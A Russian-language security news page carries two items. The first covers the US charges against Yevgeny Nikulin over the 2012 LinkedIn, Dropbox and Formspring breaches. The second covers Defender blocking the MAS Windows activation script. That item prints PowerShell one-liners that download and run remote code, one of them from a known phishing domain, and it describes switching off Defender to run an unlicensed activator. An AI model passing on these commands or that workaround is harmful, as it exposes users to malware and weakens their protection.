Соединенные Штаты обвиняют во взломе LinkedIn и Dropbox россиянина

Соединенные Штаты обвиняют во взломе LinkedIn и Dropbox россиянина

Соединенные Штаты обвиняют во взломе LinkedIn и Dropbox россиянина

Арестованный ранее в этом месяце чешской полицией человек русской национальности обвиняется в Соединенных Штатах во взломе LinkedIn, Dropbox и Formspring. Евгений Александрович Никулин, 29 лет, город Москва, Россия, был задержан чешскими властями 5 октября, но новость об аресте появилась только на прошлой неделе.

Изначально считалось, что арест был связан с кибератаками на политические организации США, однако потом выяснилось, что это связано со взломом, которым подверглись социальные сети в 2012 году.

Департамент юстиции США в пятницу объявил, что Никулин был обвинен большим федеральным жюри в Окленде, штат Калифорния по девяти пунктам, связанным с незаконным получением информации. Власти утверждают, что помимо LinkedIn, Никулин ответственен за атаки в 2012 году на Dropbox и Formspring.

Проблема с Dropbox заключалась в том, что были украдены данные одного из сотрудников, что привело к тому, что опасности подверглись более 68 миллионов аккаунтов. Эта информация не разглашалась ранее. Что касается сервиса вопросов и ответов Formspring, хакеры слили в сеть 420000 хэшированных паролей, это привело к тому, что пришлось сбросить пароли всем учетным записям этого сервиса.

Согласно Министерству юстиции, LinkedIn также был скомпрометирован из-за того, что были получены данные сотрудников. Также власти утверждают, что Никулин вступил в сговор с третьими лицами для продажи украденной информации.

Никулин находится в настоящее время под стражей в Чехии и США надеется убедить чешские власти экстрадировать его. С другой стороны, Москва настаивает на том, чтобы Никулина передали России.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru